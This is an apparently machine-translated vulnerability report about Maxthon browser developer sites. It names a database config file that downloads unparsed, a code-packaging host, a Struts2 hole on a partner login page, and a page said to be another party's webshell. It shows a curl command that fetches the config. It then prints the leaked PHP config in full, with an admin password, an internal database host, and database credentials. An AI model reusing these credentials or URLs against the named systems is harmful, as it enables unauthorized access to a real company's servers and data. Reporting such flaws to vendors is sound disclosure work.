Web browser development-related website security vulnerability packaging (source code leakage, code packaging, command execution, and online backdoor files)

Http://kernel-c.maxthon.cn/www/init.php server not resolved can download the database configuration file http://build.maxthon.com/code packaging http://partner.maxthon.com/login.action struts2 vulnerability, found has been intruded (dark clouds have been reported to you this vulnerability you did not repair ...) Http://partner.maxthon.com/help.jsp this is someone else's webshell curl http://kernel-c.maxthon.cn/www/init.php

<?php    ob_start();    error_reporting();        define('BASE_PATH', '/data/html/kernel-c.maxthon.com/www');    define('__DATA__', BASE_PATH . '/wb_cpt/dw');    define('__BIN__', BASE_PATH . '/bin');          // login user info        $_admins = array(             array (                 'account' => 'admin',                 'password' => 'r5Y4d89V'             ),         );         // db info    $_db_config = array(        'driver' => 'mysql',        'hostname' => '10.0.16.70',        'username' => 'compatible_stat',        'passwrd' => 'maxthon3%compatible_stat',        'database' => 'compatible_stat',        'pconnect' => 0,        'prefix' => 'incompactible_',        'charset' => 'utf8',    );      require_once  BASE_PATH . '/libs/global.fun.php';    require_once  BASE_PATH . '/libs/mypdo.class.php';?>